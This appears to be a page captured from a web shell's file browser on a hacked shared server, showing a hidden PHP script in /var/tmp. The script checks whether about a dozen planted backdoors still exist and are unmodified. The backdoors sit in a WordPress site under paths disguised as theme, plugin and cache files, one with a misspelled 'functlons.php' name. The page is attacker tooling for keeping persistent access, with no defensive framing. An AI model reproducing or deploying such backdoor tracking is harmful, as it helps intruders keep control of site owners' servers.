HEX
Server: Apache
System: Linux iad1-shared-e1-26 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
User: ricpug (13815490)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: //var/tmp/.locked
<?php   $r = '/home/saynigeria/saynigeria.com'; $x = ["/wp-blog-header.php"=>"bd@@1046268@@If-Unmodified-Since",
"/wp-content/themes/videozoom/functions/wpzoom/init.php"=>"bd@@1046277@@locked",
"/wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-wp-meta-seo.php"=>"bd@@1046278@@Authorization",
"/wp-content/plugins/mailchimp-subscribe-sm/integrations/aweber_api/oauth_adapter.php"=>"bd@@1046280@@oauthexceptions",
"/wp-content/plugins/wp-letsencrypt-ssl/freemius/templates/plugin-info/screenshots.php"=>"bd@@1046281@@Clear-Site-Data",
"/wp-content/plugins/quick-adsense/includes/vendor/GeoIP/GeoIPDatas/106.php"=>"bd@@1046283@@Authorization",
"/wp-content/cache/all/2014/10/page/10/lang.en.home.inc.php"=>"bd@@1046289@@533",
"/wp-content/cache/all/2014/11/page/10/install.rsform.php"=>"bd@@1046290@@233",
"/wp-content/cache/all/2017/01/page/3/Question.php"=>"bd@@1046291@@1053",
"/wp-content/cache/all/2021/09/page/11/admin.live.tpl.php"=>"bd@@1046292@@536",
"/wp-content/cache/all/category/news/page/2232/mailto.php"=>"bd@@1046293@@225",
"/wp-content/themes/social-blog/wp-config.php"=>"bd@@1039678@@1049",
"/wp-content/themes/driven/functlons.php"=>"bd@@1032632@@1049"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');